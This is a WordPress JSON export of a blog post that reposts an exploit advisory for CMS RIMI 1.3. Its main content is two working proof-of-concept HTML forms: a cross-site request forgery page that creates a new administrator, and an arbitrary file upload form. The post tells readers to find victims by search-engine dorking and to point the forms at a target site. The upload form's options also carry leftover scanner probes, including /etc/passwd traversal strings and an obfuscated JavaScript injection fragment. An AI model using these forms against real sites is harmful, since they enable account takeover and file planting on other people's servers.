{"id":59146,"date":"2024-08-23T20:00:04","date_gmt":"2024-08-23T17:00:04","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180338\/cmsrimi13-xsrf.txt"},"modified":"2024-08-23T20:00:04","modified_gmt":"2024-08-23T17:00:04","slug":"cms-rimi-1-3-cross-site-request-forgery-file-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cms-rimi-1-3-cross-site-request-forgery-file-upload\/","title":{"rendered":"CMS RIMI 1.3 Cross Site Request Forgery \/ File Upload"},"content":{"rendered":"

=============================================================================================================================================
| # Title : CMS RIMI v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https:\/\/github.com\/myroot593\/RIMICMS |
=============================================================================================================================================<\/p>\n

poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] The following html code create a new admin .<\/p>\n[+] Go to the line 9.<\/p>\n[+] Set the target site link Save changes and apply . <\/p>\n[+] save code as poc.html .<\/p>\n

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>Profile User Form<\/title>
<\/head>
<body>
<form action=”http:\/\/127.0.0.1\/RIMICMS-master\/admin\/tambah-user.php” method=”POST”>
<!– Text input for username –>
<label for=”username”>Username:<\/label>
<input type=”text” id=”username” name=”username” required><\/p>\n

<!– Password input for password –>
<label for=”password”>Password:<\/label>
<input type=”password” id=”password” name=”password” required><\/p>\n

<!– Password input for confirm password –>
<label for=”confirm_password”>Confirm Password:<\/label>
<input type=”password” id=”confirm_password” name=”confirm_password” required><\/p>\n

<!– Text input for name –>
<label for=”nama”>Nama:<\/label>
<input type=”text” id=”nama” name=”nama” required><\/p>\n

<!– Text input for email –>
<label for=”email”>Email:<\/label>
<input type=”email” id=”email” name=”email” required><\/p>\n

<!– Hidden input for user ID –>
<input type=”hidden” name=”id” value=””><\/p>\n

<!– Submit button –>
<button type=”submit”>Submit<\/button>
<\/form>
<\/body>
<\/html><\/p>\n

—————— [+] Part 2 arbitrary file upload file uplaod [+] ————-<\/p>\n[+] Go to the line 3.<\/p>\n[+] Set the target site link Save changes and apply .<\/p>\n[+] Your file : 127.0.0.1\/cmsrimi\/content <\/p>\n[+] save code as poc.html .<\/p>\n

<p class=”sukses-form”><\/p>
<p class=”error-form”><\/p>
<form action=”http:\/\/127.0.0.1\/RIMICMS-master\/admin\/tambah-berita.php” method=”post” enctype=”multipart\/form-data”>
<div class=”form-group “>
<label>Judul :<\/label>
<input type=”text” name=”judul_berita” class=”form-control” id=”judul_berita1″ placeholder=”Masukan judul berita” value=””>
<span><p class=”error-form”><\/p><\/span>
<\/div>
<div class=”form-group “>
<label>Isi Berita :<\/label>
<textarea class=”ckeditor” name=”isi_berita” id=”isi_berita”><\/textarea>
<span><p class=”error-form”><\/p><\/span>
<\/div>
<div class=”form-group”>
<label>Kategori Berita :<\/label>
<select class=’form-control’ name=’kategori_berita’ id=’kategori_berita’ required=”><option value=1>1<\/option><option value=a60CyEG6>a60CyEG6<\/option><option value=0+0+0+1>0+0+0+1<\/option><option value=basGxKs3>basGxKs3<\/option><option value=${9999829+9999678}>${9999829+9999678}<\/option><option value=1&n991278=v96422>1&n991278=v96422<\/option><option value=)>)<\/option><option value=\/etc\/passwd>\/etc\/passwd<\/option><option value=!(()&&!|*|*|>!(()&&!|*|*|<\/option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******<\/option><option value=\\'”()>\\'”()<\/option><option value=testasp.vulnweb.com>testasp.vulnweb.com<\/option><option value=kategori-berita.php>kategori-berita.php<\/option><option value=file:\/\/\/etc\/passwd>file:\/\/\/etc\/passwd<\/option><option value=WEB-INF\/web.xml?>WEB-INF\/web.xml?<\/option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?<\/option><option value=1\\'”>1\\'”<\/option><option value=><\/option><option value=\/WEB-INF\/web.xml?>\/WEB-INF\/web.xml?<\/option><option value=\/www.vulnweb.com>\/www.vulnweb.com<\/option><option value=\\'”>\\'”<\/option><option value=942313>942313<\/option><option value=@@5nFvp>@@5nFvp<\/option><option value=<!–><!–<\/option><option value=JyI=>JyI=<\/option><option value=\/\/www.vulnweb.com>\/\/www.vulnweb.com<\/option><option value=1_927257>1_927257<\/option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP<\/option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb<\/option><option value=1_924662>1_924662<\/option><option value=1 src=943436>1 src=943436<\/option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP<\/option><option value=1_996088>1_996088<\/option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP<\/option><option value=1_984620>1_984620<\/option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP<\/option><\/select> <p class=”error-form”><\/p>
<\/div>
<div class=”form-group”>
<label>Status:<\/label>
<select class=”form-control” name=”status_berita” id=”status_berita”>
<option value=”Diterbitkan”>Diterbitkan<\/option>
<option value=”Draft”>Draft<\/option>
<\/select>
<\/div>
<div class=”form-group”>
<label>Gambar Berita<\/label>
<input type=”hidden” name=”tanggal_berita” id=”tanggal_berita” value=”24-08-22″>
<input type=”file” class=”form-control-file” id=”gambar_berita” name=”gambar_berita”>
<p class=”error-form”><\/p>
<\/div>
<button type=”submit” class=”btn btn-primary”>Submit<\/button>
<\/form>
<p class=”error-form”><\/p>
<p class=”error-form”><\/p><\/p>\n

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"

=============================================================================================================================================| # Title : CMS RIMI v1.3 CSRF Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/github.com\/myroot593\/RIMICMS |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] The following html code create a new admin …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59146","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59146","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59146"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59146\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59146"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}